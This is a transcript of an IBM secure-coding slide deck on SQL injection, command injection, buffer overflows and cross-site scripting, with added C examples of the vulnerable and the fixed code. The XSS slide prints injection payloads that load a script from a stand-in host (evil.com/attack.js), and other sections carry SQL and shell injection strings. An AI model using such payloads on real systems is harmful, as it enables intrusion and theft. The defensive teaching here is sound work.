Inside the Mind of a Hacker

PAUL IONESCU, IBM X-FORCE ETHICAL HACKING TEAM

Uploaded by ibm-security, posted 08-Jan-2017

TRANSCRIPT

Page 1: Uncover What's Inside the Mind of a Hacker

Inside the Mind of a Hacker

PAUL IONESCU, IBM X-FORCE ETHICAL HACKING TEAM

Page 2: Uncover What's Inside the Mind of a Hacker

INTRODUCTION

The Price of a Security Bug

Page 3: Uncover What's Inside the Mind of a Hacker

3 IBM Security

Functionality vs. Security

• As developers we want to build highly functional software, unconstrained by compliance standards and tedious business processes.

• Product security is incorrectly perceived as a burden on agile software development.

• Security measures are often an afterthought: something you have to do, not something you want to do.

[Chart: Security (High/Low) plotted against Functionality (High/Low), showing the common belief that the two trade off against each other]

Page 4: Uncover What's Inside the Mind of a Hacker


Developing Secure and Highly Functional Products is Possible

• If security is addressed early in the development lifecycle it is neither hard nor costly, and it does not conflict with functionality.

• This is achieved by educating developers about the threats their code faces.

[Chart: the same Security vs. Functionality axes, with the trade-off view marked "Not accurate"]

Page 5: Uncover What's Inside the Mind of a Hacker


What is a 0-day?

• A zero-day is a security bug that is unknown to the vendor (so no patch exists) but has become known to a malicious party; the vendor has had "zero days" to fix it.

• Commonly found in widely used software, where a single flaw reaches millions of installations.

Page 6: Uncover What's Inside the Mind of a Hacker


Meet The Hackers Who Sell Spies The Tools To Crack Your PC

"Vupen's chief executive and lead hacker, Chaouki Bekrar, says his company never had any intention of telling Google its secret techniques—certainly not for $60,000 in chump change."

ANDY GREENBERG, FORBES

The Security Vulnerability Business

• VUPEN – specializing in selling zero-days to the highest bidder

• Refused the Pwn2Own $60k prize because the zero-day was worth more undisclosed

Page 7: Uncover What's Inside the Mind of a Hacker


Bug Poaching

• As recently uncovered by IBM X-Force, web application flaws are being used in ransomware-style extortion.

• 30 enterprise organizations were targeted last year.

• Attackers find and exploit website vulnerabilities; SQL injection is the main method of attack.

• Once they obtain sensitive data the attackers store it on a cloud service.

• An email is sent to the organization linking to the data as proof that the attacker has penetrated the network.

• The attackers then demand large payments ($30k+) to reveal the flaws.

Page 8: Uncover What's Inside the Mind of a Hacker


Types of Hackers

• White-hat hackers
  – abide by the rules of responsible disclosure
  – notify companies about vulnerabilities before making them public
  – require no reward other than recognition for identifying the issue
  – also referred to as ethical hackers

• Gray-hat hackers
  – operate at the boundary of the law
  – may sell zero-day vulnerabilities to the bad guys or to governments

• Black-hat hackers
  – the cybercriminals
  – use zero-days to break into systems and steal data

Page 9: Uncover What's Inside the Mind of a Hacker


What would a Hacker do?

• Understanding common programming flaws helps developers prevent security issues.

• Getting into the hacker mindset makes it possible to identify abuse cases.

• Implementing software defenses while the software is written reduces cost and can avoid thousands of dollars in damages.

• You can cost the black hats and grey hats a lot of money, because they won't have 0-days to sell!

Page 10: Uncover What's Inside the Mind of a Hacker


The Top Programming Flaws

• Two widely used lists: the OWASP Top 10 and the CWE/SANS Top 25 (maintained by MITRE).

• The Top 25 focuses on software mistakes, catalogued as Common Weakness Enumeration (CWE) entries. The first four entries:

#  CWE      Name

1  CWE-89   Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

2  CWE-78   Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

3  CWE-120  Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')

4  CWE-79   Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Page 11: Uncover What's Inside the Mind of a Hacker

ATTACKING THE DATABASE

SQL Injection

Page 12: Uncover What's Inside the Mind of a Hacker


The 15 worst data security breaches of the 21st Century

"134 million credit cards exposed through SQL injection to install spyware on Heartland's data systems"

TAYLOR ARMERDING, WWW.CSOONLINE.COM

The Worst Data Breach of the 21st Century

• For comparison, the OPM hack exposed 21.5 million records.

• In 2012 SQLi was responsible for more than half of all data breaches where the attack type was disclosed, according to IBM X-Force.

Page 13: Uncover What's Inside the Mind of a Hacker


What is the programming flaw?

• User input is concatenated into a database query string.

• The attacker can manipulate the query, effectively injecting SQL code and altering the functionality of the application.

• Depending on the database engine and the privileges of the application's database account, attackers can even execute OS commands.

Page 14: Uncover What's Inside the Mind of a Hacker


Preventing SQL Injection with Parameterized Statements

• Java PreparedStatement example (the code itself is on the slide and not reproduced in this transcript): the query is written with placeholders and the values are bound separately, removing the need for concatenation.

Page 15: Uncover What's Inside the Mind of a Hacker


Adding Input Validation to Prevent Injection

• Many user-provided parameters only need to be alphanumeric.

• Whitelist input validation: alphanumeric by default, special characters allowed only by exception.

• This reduces the attack surface for many types of attacks, not only SQL injection; it is defense in depth, not a replacement for parameterized queries.

• Implement an input validation framework rather than ad hoc checks in each handler.
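The whitelist validator that the SQL injection slides call for, as an added example in C that is not code from the original deck. The two parameter shapes (a user name that is alphanumeric only, an e-mail address that additionally needs a few characters by exception) and their length limits are assumptions; the classic SQLi payload is constructed for the demonstration. Parameterized queries remain the primary defense; this is the defense-in-depth layer the slide describes.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Whitelist validator: every byte must be ASCII alphanumeric, or one of
 * the characters the caller explicitly allows by exception. Length is
 * bounded too, so an oversized value is rejected before it reaches a
 * query, a shell command or a page template. */
bool is_valid_param(const char *value, size_t max_len, const char *extra_allowed)
{
    if (value == NULL)
        return false;
    size_t len = strlen(value);
    if (len == 0 || len > max_len)
        return false;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)value[i];
        if (isalnum(c))                      /* default: alphanumeric only */
            continue;
        if (extra_allowed != NULL && strchr(extra_allowed, c) != NULL)
            continue;                        /* allowed by exception */
        return false;                        /* anything else is rejected */
    }
    return true;
}

/* Per-parameter policies (assumed shapes, not from the deck): a user name is
 * alphanumeric only; an e-mail address additionally needs @ . - _ + */
bool is_valid_username(const char *s) { return is_valid_param(s, 32, NULL); }
bool is_valid_email(const char *s)    { return is_valid_param(s, 254, "@.-_+"); }

int main(void)
{
    /* Constructed inputs: a legitimate name, the classic SQLi payload,
     * a shell-injection attempt and an e-mail carrying a comment sequence. */
    const char *inputs[] = { "alice42", "' OR '1'='1", "bob; id", "x@example.com' --" };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("%-20s username:%s email:%s\n", inputs[i],
               is_valid_username(inputs[i]) ? "ok" : "REJECT",
               is_valid_email(inputs[i]) ? "ok" : "REJECT");
    return 0;
}
```

Note that the exception list is per parameter, not global: the quote and dash that the e-mail payload needs are never on any list, so both the `' OR '1'='1` and the `' --` payloads are rejected without the validator knowing anything about SQL.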

Page 16: Uncover What's Inside the Mind of a Hacker

ATTACKING THE SHELL

OS Command Injection

Page 17: Uncover What's Inside the Mind of a Hacker


Web attacks build on Shellshock bug

One group used their Shellshock botnet to bombard machines run by Akamai with huge amounts of junk data to try to knock them offline.

WWW.BBC.COM

The Famous 0-Day

• The 2014 Shellshock bug affected millions of servers around the world.

• It has its own logo and Wikipedia article.

Page 18: Uncover What's Inside the Mind of a Hacker


What is the programming flaw?

• The software concatenates or substitutes user input into a shell command.

• The example below is from the recently disclosed "ImageTragick" bug (the delegate command and payload are on the slide, not in this transcript).

• The %M part is substituted with a user-provided link. If a graphics file contains a link like this:

• The software executes:

Page 19: Uncover What's Inside the Mind of a Hacker


Preventing Command Injection

• Use input validation.

• Use parameterized functions, where user input is passed as separate arguments rather than as part of one full command string, so no shell ever parses it.

[Code panes on slide: Vulnerable | Using a Parameterized Function]
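The two panes side by side, as an added C example that is not the deck's code. `/bin/echo` stands in for the image converter (an assumption so the block runs without ImageMagick), and the payload is constructed: it closes the single quote the developer hoped would protect them and appends a second command, which is the same shape as the %M substitution on the previous slide.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Read everything the child wrote into out (NUL-terminated). */
static void read_all(FILE *f, char *out, size_t out_len)
{
    size_t n = fread(out, 1, out_len - 1, f);
    out[n] = '\0';
}

/* VULNERABLE: the user's string is substituted into one command line that
 * /bin/sh then parses. Single quotes look like protection, but the payload
 * simply closes them and the rest of the string becomes shell syntax. */
char *run_vulnerable(const char *user_url, char *out, size_t out_len)
{
    char cmd[512];
    snprintf(cmd, sizeof cmd, "/bin/echo '%s'", user_url);
    FILE *p = popen(cmd, "r");            /* runs: sh -c "<cmd>" */
    if (p == NULL)
        return NULL;
    read_all(p, out, out_len);
    pclose(p);
    return out;
}

/* PARAMETERIZED: program and arguments travel as separate argv entries and
 * no shell is involved, so ; ' | ` $ inside user_url are just bytes of one
 * argument handed to the program. */
char *run_parameterized(const char *user_url, char *out, size_t out_len)
{
    int fd[2];
    if (pipe(fd) != 0)
        return NULL;
    pid_t pid = fork();
    if (pid < 0)
        return NULL;
    if (pid == 0) {                        /* child: stdout -> pipe, then exec */
        close(fd[0]);
        dup2(fd[1], STDOUT_FILENO);
        close(fd[1]);
        char *const argv[] = { "/bin/echo", (char *)user_url, NULL };
        execv(argv[0], argv);
        _exit(127);                        /* only reached if exec failed */
    }
    close(fd[1]);
    FILE *p = fdopen(fd[0], "r");
    if (p == NULL) {
        close(fd[0]);
        return NULL;
    }
    read_all(p, out, out_len);
    fclose(p);
    int status;
    waitpid(pid, &status, 0);
    return out;
}

int main(void)
{
    /* Constructed payload: closes the quote and appends a second command. */
    const char *payload = "x'; echo INJECTED; echo '";
    char out[256];
    printf("vulnerable:\n%s", run_vulnerable(payload, out, sizeof out));
    printf("parameterized:\n%s", run_parameterized(payload, out, sizeof out));
    return 0;
}
```

The vulnerable path prints `x`, then `INJECTED`, because the shell saw three commands; the parameterized path prints the payload verbatim as one argument. Escaping or quoting the input is not the fix, the argv boundary is: the same applies to `subprocess.run([...])` without `shell=True` in Python or `ProcessBuilder` in Java.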

Page 20: Uncover What's Inside the Mind of a Hacker

ATTACKING THE MEMORY

Buffer Overflow

Page 21: Uncover What's Inside the Mind of a Hacker


Pwn2Own

• A contest held during the CanSecWest security conference.

• Payouts topped $500,000 in 2014, with over a dozen new vulnerabilities found in Adobe Reader, Adobe Flash Player, Internet Explorer 11, Google Chrome and Mozilla Firefox.

• Many of the zero-days disclosed at Pwn2Own are memory flaws, for example CVE-2012-1876, a buffer overflow in Internet Explorer, or CVE-2014-1303, a buffer overflow in Apple Safari.

• Exploiting such a vulnerability gives the attacker complete control over the victim's machine.

• For these reasons memory flaws in common software are extremely valuable on the black market.

Page 22: Uncover What's Inside the Mind of a Hacker


Chinese Hackers Compromised Forbes.com Using IE, Flash Zero Days

Chinese APT group uses IE, Flash zero days to compromise Forbes.com

CHRIS BROOK, WWW.THREATPOST.COM

Using Software Flaws in Cyber Espionage

Page 23: Uncover What's Inside the Mind of a Hacker


What is the programming flaw?

• A buffer overflow is caused by improper memory management in C/C++ code: the language does not check that a write stays within the bounds of the buffer it targets.

• Example: a simple C program that validates a password (the code is on the slide, not in this transcript).

• The code performs no validation of the length of the user input and does not ensure that enough memory was allocated to store the data coming from the user.

Page 24: Uncover What's Inside the Mind of a Hacker


Overflowing the buffer

• The table on the slide shows the memory layout of the vulnerable program, where \0 stands for the null character.

• If the user enters more than 15 "A" characters as the verification password, the copy runs past the 16-byte buffer: the 16th character pushes the terminating null out of the buffer, and from the 17th character on the attacker's own bytes land on the information stored at the 0x0111 address.

Page 25: Uncover What's Inside the Mind of a Hacker


Overflowing the program instructions

• The attacker can overwrite the memory that controls what the program executes next (for a stack overflow, typically the saved return address) and redirect execution to arbitrary code, as shown in the simplified representation on the slide.

Page 26: Uncover What's Inside the Mind of a Hacker


Protecting From Memory Attacks

• Use safe functions. For example fgets(...) lets you limit the size of the input; fgets(userPass, 16, stdin) resolves the problem, because it reads at most 15 characters and always null-terminates.

• Ensure that the size of the input matches the size of the allocated memory.

• Never use user input as a format string argument. This leads to another memory flaw: the format string vulnerability.

• Be careful both when allocating and when releasing memory. Use-after-free is another type of memory flaw, where the program keeps using a pointer to memory it has already freed; the allocator may hand that memory to other data, so what the program reads or writes through the stale pointer can be attacker-controlled.

• Use safe compiler flags. They enable compiler and operating system defenses that make executing injected code much harder: Address Space Layout Randomization (ASLR, available on Windows, Linux and macOS), stack canaries (/GS on MSVC, -fstack-protector on GCC/Clang) and non-executable data (DEP/NX).
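The password check from the previous slides, reconstructed as an added C example that is not the deck's own program. The struct layout (a 16-byte buffer followed immediately by an `authenticated` flag) and the 15- and 20-character inputs are assumptions chosen to mirror the slide's memory table; the unchecked copy is capped at the struct size only so the demonstration stays defined behaviour.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#endif
#include <stdio.h>
#include <string.h>

/* Memory layout mirroring the slide's table: the password buffer is
 * immediately followed by data the program trusts. */
struct login_frame {
    char userPass[16];
    int  authenticated;        /* the "next address" an overflow reaches */
};

/* VULNERABLE shape: copy the whole input, length never checked.
 * The copy is capped at sizeof(frame) only so this demonstration stays
 * defined behaviour; strcpy()/gets() would keep writing past the struct. */
struct login_frame check_vulnerable(const char *input)
{
    struct login_frame f;
    memset(&f, 0, sizeof f);
    size_t n = strlen(input) + 1;          /* bytes strcpy() would copy */
    if (n > sizeof f)
        n = sizeof f;
    memcpy(&f, input, n);                  /* runs straight through userPass */
    return f;
}

/* FIXED: fgets() reads at most sizeof(userPass)-1 = 15 characters and
 * always NUL-terminates, so the flag cannot be touched. */
struct login_frame check_fixed(FILE *in)
{
    struct login_frame f;
    memset(&f, 0, sizeof f);
    if (fgets(f.userPass, sizeof f.userPass, in) != NULL)
        f.userPass[strcspn(f.userPass, "\n")] = '\0';   /* drop the newline fgets keeps */
    return f;
}

/* Same as check_fixed() but fed from a string, for the demo and tests. */
struct login_frame check_fixed_str(const char *input)
{
    FILE *in = fmemopen((void *)input, strlen(input), "r");
    if (in == NULL) {
        struct login_frame empty;
        memset(&empty, 0, sizeof empty);
        return empty;
    }
    struct login_frame f = check_fixed(in);
    fclose(in);
    return f;
}

int main(void)
{
    const char *attack = "AAAAAAAAAAAAAAAAAAAA\n";   /* constructed: 20 'A's + newline */
    struct login_frame v = check_vulnerable(attack);
    struct login_frame s = check_fixed_str(attack);
    printf("vulnerable: authenticated=0x%08x\n", (unsigned)v.authenticated);
    printf("fixed:      authenticated=0x%08x userPass=\"%s\"\n",
           (unsigned)s.authenticated, s.userPass);
    return 0;
}
```

With twenty A's the vulnerable copy leaves `authenticated` equal to 0x41414141, the slide's overwritten "next address" made visible; the fgets() version stops at 15 characters. One caveat the slide does not mention: fgets() leaves the unread remainder of a long line in the stream, so a second read will pick up the tail of the attacker's input; drain the rest of the line before reading the next field.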

Page 27: Uncover What's Inside the Mind of a Hacker

ATTACKING THE WEB PAGE

Cross-Site Scripting

Page 28: Uncover What's Inside the Mind of a Hacker


"Earlier today we were informed of a malicious site that was spreading links to StalkDaily.com on Twitter without user consent via a cross-site scripting vulnerability." TWITTER COMMUNIQUE, APR 11, 2009

The XSS Worm

• A malicious Cross-Site Scripting (XSS) payload spread itself from user to user by modifying each user's profile.

• Other social networking sites have been notably affected by XSS worms: the Samy worm hit 1 million MySpace users in 2005.

• XSS is also commonly used to spoof websites and steal passwords; major online retailers have been targeted.

Page 29: Uncover What's Inside the Mind of a Hacker


What is the programming flaw?

• XSS occurs when the web page inserts user input in an unsafe context.

• Example unsafe contexts:

  – During server-side page generation:

        User name: <%=request.getParameter("userName")%>

    rendered with attacker input as:

        User name: <script src="https://evil.com/attack.js"></script>

  – During server-side page generation, inside a JavaScript event-handler attribute:

        <body onload="loadProfile(<%=request.getParameter('userid')%>)">

    rendered with attacker input as:

        <body onload="loadProfile(1);eval("var a=document.createElement(\"script\");a.src=\"https://evil.com/attack.js\";document.body.appendChild(a);")">

  – During server-side page generation, inside a JavaScript snippet:

        <script>loadProfile(<%=request.getParameter('userid')%>)</script>

  – Dynamic updates through the innerHTML property:

        userNameDiv.innerHTML = user.Name;

• Because so many contexts can be affected by XSS it is difficult to defend against and easy to miss.

Page 30: Uncover What's Inside the Mind of a Hacker


Protecting From Web Page Attacks

• HTML-encode user input before inserting it into an unsafe context, using the encoder that matches the context (HTML body, attribute value, JavaScript string, URL); a numeric parameter such as userid should simply be validated as an integer.

• Dynamic page updates should set the innerText / textContent property of HTML nodes, never innerHTML.

• Enforcing request token checks can blunt reflected cross-site scripting because a crafted link without a valid token is rejected and the page expires. It will also prevent

• Use secure headers:
  X-XSS-Protection: 1; mode=block – enables the browser's XSS filter (since removed from Chrome and Edge and never implemented in Firefox, so do not rely on it)
  Content-Security-Policy: script-src 'self' – prevents loading scripts from other origins and, unless 'unsafe-inline' is added, also blocks inline scripts and eval()
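HTML encoding for the body and attribute-value contexts from the previous slide, as an added C example (not the deck's code, which would be Java/JSP). The `render_user_name` wrapper and the buffer sizes are assumptions; the payload is the `<script src=...>` string from the slide.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Encode the characters that let data break out of an HTML text node or a
 * quoted attribute value. Returns false if the output buffer is too small;
 * it never silently truncates, since a cut-off entity is itself a bug. */
bool html_encode(const char *in, char *out, size_t out_len)
{
    size_t o = 0;
    for (; *in != '\0'; in++) {
        const char *rep = NULL;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#x27;"; break;   /* &apos; is not HTML 4; use the numeric form */
        default:   break;
        }
        size_t need = rep != NULL ? strlen(rep) : 1;
        if (o + need >= out_len)             /* keep room for the terminator */
            return false;
        if (rep != NULL)
            memcpy(out + o, rep, need);
        else
            out[o] = *in;
        o += need;
    }
    out[o] = '\0';
    return true;
}

/* The slide's "User name: ..." fragment, built safely (assumed helper). */
bool render_user_name(const char *user_name, char *out, size_t out_len)
{
    char enc[512];
    if (!html_encode(user_name, enc, sizeof enc))
        return false;
    int n = snprintf(out, out_len, "User name: %s", enc);
    return n >= 0 && (size_t)n < out_len;
}

int main(void)
{
    /* Constructed payload: the slide's injected script tag. */
    const char *payload = "<script src=\"https://evil.com/attack.js\"></script>";
    char page[512];
    if (render_user_name(payload, page, sizeof page))
        puts(page);
    return 0;
}
```

The encoded fragment still displays the attacker's text, but the browser parses it as text, not as a tag. This encoder is only correct for the first two contexts on the slide; data placed inside a `<script>` block or an event-handler attribute needs JavaScript string escaping on top, and the safer design is to avoid those contexts entirely by passing data through an attribute and reading it with textContent.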

Page 31: Uncover What's Inside the Mind of a Hacker

DEFENDING AGAINST THE HACKERS

Catching Software Flaws

Page 32: Uncover What's Inside the Mind of a Hacker


Catching SQL Injection and Command Injection with Dynamic Analysis

• AppScan is an application security scanner.

• Tooling is available both as a cloud service and as an installable product.

• It interacts with the running application and conducts automated attacks.

• The screenshot on the slide shows a scan of a server vulnerable to SQL injection and OS command injection.

Page 33: Uncover What's Inside the Mind of a Hacker


Catching Buffer Overflow with Static Analysis

• AppScan Source is a static analysis tool, also available as a cloud service.

• It examines the program code to identify security issues.

• The screenshot on the slide shows a scan of the vulnerable sample program presented earlier.

Page 34: Uncover What's Inside the Mind of a Hacker

ibm.com/security

securityintelligence.com

xforce.ibmcloud.com

@ibmsecurity

youtube/user/ibmsecuritysolutions

© Copyright IBM Corporation 2016. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and / or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others.

Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed, misappropriated or misused or can result in damage to or misuse of your systems, including for use in attacks on others. No IT system or product should be considered completely secure and no single product, service or security measure can be completely effective in preventing improper use or access. IBM systems, products and services are designed to be part of a lawful, comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective.

IBM DOES NOT WARRANT THAT ANY SYSTEMS, PRODUCTS OR SERVICES ARE IMMUNE FROM, OR WILL MAKE YOUR ENTERPRISE IMMUNE FROM, THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY.

FOLLOW US ON:

THANK YOU